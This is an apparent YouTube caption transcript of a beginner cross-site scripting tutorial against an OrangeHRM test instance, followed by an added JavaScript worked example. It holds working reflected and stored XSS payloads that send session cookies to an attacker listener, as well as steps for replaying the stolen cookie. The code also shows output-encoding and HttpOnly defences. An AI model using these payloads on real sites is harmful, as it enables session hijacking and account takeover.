Cross Site Scripting (XSS) tutorial for Beginners

Captions
This is going to be a really interesting tutorial because it allows us to plug our own code into a website, allowing us to control where the website is heading and what we want to do with those existing sessions, and all you need to know is a little bit of JavaScript and you're good to go. And before we get started, remember, hacking is illegal. If you get caught hacking, do not tell them you know who Mr Hacker Loi is, and if you want to you can go ahead and try hacking Mr Loi Liang Yang's website, loiliangyang.com, and yes, I promise you I will help you find your IP address, I'll help you find your username, your passwords, your data and everything about you, for free, so go ahead and do that.

So this is what we call a cross-site scripting attack, and there are two forms of it. The first type is what we call the reflected cross-site scripting attack, and what it does here is that when you target a website, say for example loiliangyang.com, what you have here is the following path, and of course in this case you could enter something like JavaScript and you're able to, say, capture the cookie information, you're able to redirect the website to another completely different site. And the second type of attack is what we call a stored cross-site scripting attack. So what this does is that your JavaScript in this case is going to be stored in the computer backend, usually, typically, on the backend database system, and you have your code right here, so whoever loads the site will load the hacker's JavaScript as well. So this is what we call the stored cross-site scripting attack, and yes, you are correct, we'll be learning both of them today. So this is going to be a pretty long tutorial and I already had 50 cups of coffee in order to do this tutorial for you, so go ahead, grab yourself a cup of coffee, tea or me. So right in front of us we're in Kali Linux, this is going to be the ethical hacking operating system that we'll be using as part of doing this tutorial, so that's really cool.

So right in front of us we have a website, all right, so this states "your new level of human resource management", HR management, and we have a login on the left side. So let's go ahead and enter, say, our login name, all right, so in this case I can enter hackerloi and we have the password of 12345678. Of course this is the password to use, especially when you are a popular hacker, because people will think that you'll be using a very complicated password, so again, reverse psychology 101. So go ahead and click on login and right here we're in, right, we're now inside the OrangeHRM human resource management system, and what we're trying to do here is to uncover the entry points that will allow us to inject our own script. So right over here we have a typical-looking website and what we're trying to do now is we're targeting the part here which is the URL. So in this case we would have different types of links, pages and so on, and what we're trying to target and attack over here is to inject different types of script into this segment so that we can see whether we're able to do, say for example, an alert followed by, say, XSS, and we have different payloads to try out, and as we inject different types of payload over here, the moment we get a pop-up, say in this case for an alert, it means that we are able to prove that this segment is vulnerable, susceptible to a cross-site scripting attack. And you can see over here we are in the following directory in Kali Linux, which is /usr/share/wordlists/wfuzz/Injections, and once we're over here we're able to go ahead and figure out what are the different types of payloads that we can use as part of, again, attacking different parts of the URL. So in this case we have XSS.txt, so if I go ahead and enter, say, head XSS.txt, we can see all these are different examples of JavaScript that we can inject into the URL, and we can see which one of them is going to allow us to get the pop-up that we want, to validate that this segment or this section of the page is vulnerable.

And as you can see over here we have the URL, in this case we're going into the directory of templates/recruitment, the job vacancy PHP page, so this is the target page, and following that we have recruitcode=, so they're expecting some kind of recruit code, and in this case we're ending off the JavaScript first, so we're ending off the JavaScript and inserting our own JavaScript into the recruit code. So in this case this allows us to execute whatever script we want to write in here, and once you're ready, in three, two, one, hit enter on that. Boom, you have this beautiful pop-up, and what does it mean? It means that this part of the page is susceptible, it is vulnerable to a cross-site scripting attack. And you'll be saying, okay, so what, what can we do about it? Now before we go into what we can do about it, you can also use a tool like Burp Suite to help us load all of those different malicious cross-site scripting payloads into the target field. So in this case let's go ahead and start Burp, and what we can do now is go over to the top right corner of the browser, all right, so go ahead and select it, and of course use FoxyProxy, in this case we're targeting Burp, so Burp will help us intercept the requests. So once you're in here, all we got to do is, say for example, I hit enter on this again, and Burp Suite under the Proxy tab will pick this request up, and all we got to do is right-click, all right, send to, in this case let's send to Intruder. All right, so once you're in Intruder, all you got to do right now is go ahead and clear all these different payload markers, and once you're ready you can just change the recruit code, in this case maybe I'll put an a, and what I can do now is go ahead and highlight this one as the payload marker, go over to Payloads and click on Load, so in this case we load the wordlist, and of course we can go to the directory that we were at earlier, under wfuzz, under Injections, under XSS. So here we have all these different cross-site scripting attack payloads that we can use and start attacking, hammering away at that specific field, right, and we can see the length and see what is the potential response to it.

So if you want to investigate a little deeper, you can see right here we have the following, the function goBack, all right, so in this case you can see that the payload has been supplied over here, and you can see the function has the curly braces, all right, as well as another curly brace over here. So if we can escape from this, it means that this will allow us to run our own JavaScript on the site, so this is genius. So extracting the piece of code over here, you can see the following: if we could terminate from this end with a double quote and then follow with, say, a curly brace to end it all off, and then from there on we're then able to, say, close off possibly the script and then inject our own script into it, which is why the initial payload you saw earlier was working. So what we're going to do now is, we don't know the username or the password, but what we could possibly do is sort of hijack their session. So what I can do now is go ahead and use python3 -m http.server and we're starting up our server, so any time we can redirect all that session information from the user to the hacker. So in this case what I can do now is go ahead and craft a more specific payload that allows us to do just that, so you can see over here we have document.location and we're firing this over to the hacker's IP address. All right, so in this case let me just go ahead and double-check on this, this is on port 8000, all right, so let's go ahead and fix this up a little bit, so let's go ahead and enter port 8000 for this, and once we're ready, in three, two, one, hit enter on that, go back over to the terminal and see what we got, right, nothing for now. Let's go ahead and try out ip addr, okay, we have the IP address 192.168.0.117, let's go ahead and start it up again, head back over to the payload, all right, so in this case we have document.location, we have the following of document.location, 192.168.0.117, port 8000, /cookie=. Okay, let's go ahead and troubleshoot this one, okay, I've added a question mark over here, so let's go ahead and hit enter on that and let's see what we get this time around. Mhm, all right, still nothing, but no worries, let's go ahead and try something else. Now what I've done here is I've changed this up to location.href, so let's go ahead and hit enter on that, go back to the terminal, let's see what we get, uh huh. So you know what's the problem? The problem is that there are numerous special characters in here and what we need to do then is to encode it. So we can go back to Burp Suite, go to the Decoder tab, copy and paste the payload over here, go to the right side and select Encode as URL. So once we have this we can copy, go over to the browser and replace this payload with the URL-encoded payload, and once you're ready, in three, two, one, hit enter. Now go back to the terminal and see what we get. Boom, you're in, it's game over.

So here's the thing, we may not have the username or the password but it doesn't matter, what we have here now is a session cookie and all we need to do is to copy and paste that information into our browser and that's it, we would gain access to the user's existing session. Now here I am in a completely different browser, I go to the top right corner and I select More tools and I select Developer Tools. So once I'm in here, all right, what I can do now is go ahead and enter those different names as well as the values that have been assigned for this particular site, all right, so now we've got all the values, all the cookies right here, these are the hacked values, and you can see over here we have not yet gone over to one part of the site which is index.php. So once we're ready, all we're going to do now is go over to the URL and enter the following, index.php, and once you're ready go ahead and hit enter on that. Boom, we are in, I can see right here, welcome hacker, so now we have gained access to the user session. The other payload that we have here is to redirect the user to loiliangyang.com, so this is super neat. So I go over to the encoded payload, I go back to the browser and I replace this payload over here with the encoded payload, I hit enter, and watch this carefully, hit enter on that, boom, we are now brought over to Mr Hacker Loi's website.

Now moving forward, going over to the other type of cross-site scripting attack, so in this case it's a stored cross-site scripting attack. What it does is that our code, our script, will now be stored in a part of the site, possibly persisting on the backend database, so whoever loads this site will now load the code that we want to enter into the site, super cool. So here we have a super interesting piece of code, what it does here for us is it allows us to interact live with the user, so whoever loads this page, we can send a script directly over to the browser session. So what I can do now is go ahead and click on the following, all right, here you have the IP address, all right, so this is the hacker's IP address of 192.168.0.117 for the port of 3434, all right, so once we're ready, click Submit, now it's persisting over here under the entry. Now moving over to the terminal, what this does for us is it gives us a persistent interactive session with the user, so if we go ahead on that, what we can do now is, say for example, alert, you have been hacked by Mr Hacker Loi, all right, so with that I can go ahead and hit enter on this, all right, I go back over to the browser, you see over here, you have been hacked by Mr Hacker Loi. So we are interacting live with the user and I can even redirect them, as we saw earlier, to Mr Hacker Loi's website. So what I can do now is go ahead and enter the following, right, which is window.location.href, right, in this case equals, right, https://loiliangyang.com, all right, you hit enter on this, you go back over to the browser, you see here, that's a redirection, we've been redirected to Mr Hacker Loi's website. And remember kids, with great power comes great responsibility.
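Editor's worked example (added here; this is not code from the video or from OrangeHRM). The reflected case in the video hinges on one detail: the recruit-code parameter is echoed into a JavaScript string inside a goBack function, so a value that closes the string, the function body and the script element gets its own script element executed by the browser. The snippet below reconstructs that pattern as a hypothetical server template, shows why the breakout payload splits the page into separate script blocks, shows the URL-encoding step Burp's Decoder performs, and contrasts it with a renderer that emits the value as a proper JavaScript string literal. The page name `jobVacancy.php`, the parameter name `recruitcode`, the listener host `ATTACKER_HOST:8000` and the shape of the goBack function are assumptions.

```javascript
// Hypothetical reconstruction of the vulnerable template: the raw query
// parameter is concatenated straight into a <script> block. (Assumption:
// the real page's goBack function looks roughly like this.)
function renderVulnerable(recruitcode) {
  return [
    '<script>',
    'function goBack() {',
    `  var code = "${recruitcode}";`,
    '  window.location.href = "jobVacancy.php?recruitcode=" + code;',
    '}',
    '</script>',
  ].join('\n');
}

// Hardened variant. JSON.stringify yields a valid JS string literal (quotes and
// backslashes escaped); the extra replaces guarantee the literal can never
// contain "</script>" or "<!--", which the HTML parser acts on before any
// JavaScript runs, and the two line-separator characters that break JS strings.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(recruitcode) {
  return [
    '<script>',
    'function goBack() {',
    `  var code = ${jsStringLiteral(recruitcode)};`,
    '  window.location.href = "jobVacancy.php?recruitcode=" + encodeURIComponent(code);',
    '}',
    '</script>',
  ].join('\n');
}

// Attacker-side listener (assumed): `python3 -m http.server 8000` as in the video.
const ATTACKER = 'http://ATTACKER_HOST:8000';

// Breakout payload: close the string literal and the function body, close the
// script element, then open a fresh script that ships document.cookie to the
// listener. The trailing "<script>" re-opens a block so the page's leftover
// code is swallowed instead of producing a visible parse error.
const PAYLOAD =
  '";}</script><script>document.location.href="' + ATTACKER +
  '/?cookie="+document.cookie;</script><script>';

// How the victim's browser sees the reflected page: the HTML tokenizer splits
// on "</script>", so each block is compiled and run independently and the
// attacker's block executes no matter how broken goBack() is around it.
function scriptBlocks(html) {
  const blocks = [];
  const re = /<script>([\s\S]*?)<\/script>/g;
  let m;
  while ((m = re.exec(html)) !== null) blocks.push(m[1]);
  return blocks;
}

// The step the video does in Burp's Decoder: URL-encode the payload so that
// characters like "+", "&" and ";" travel to the server as part of the
// parameter value instead of being interpreted by the browser or the server
// (an unencoded "+" in the query string turns into a space, which is why the
// first attempts in the video produced no hit on the listener).
function asQueryString(param, value) {
  return param + '=' + encodeURIComponent(value);
}

// Pull the emitted literal back out of the rendered page. With the safe
// renderer it round-trips to the original value; with the vulnerable one the
// "literal" is not a string at all, because the payload already ended it.
function extractCodeLiteral(html) {
  const m = html.match(/var code = (.*);/);
  return m ? m[1] : null;
}
```

Two practical notes. First, the breakout works even though the payload sits inside a JavaScript string, because HTML parsing happens before script parsing: a bare `</script>` inside a string literal still terminates the element. Second, output encoding is the fix for the injection itself; marking the session cookie `HttpOnly` separately stops the `document.cookie` exfiltration shown in the video but not the redirect or any action the injected script performs in the victim's session.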
Info
Channel: Loi Liang Yang
Views: 77,611
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp
Id: bCP8_WYsvP4
Length: 11min 37sec (697 seconds)
Published: Sat Oct 21 2023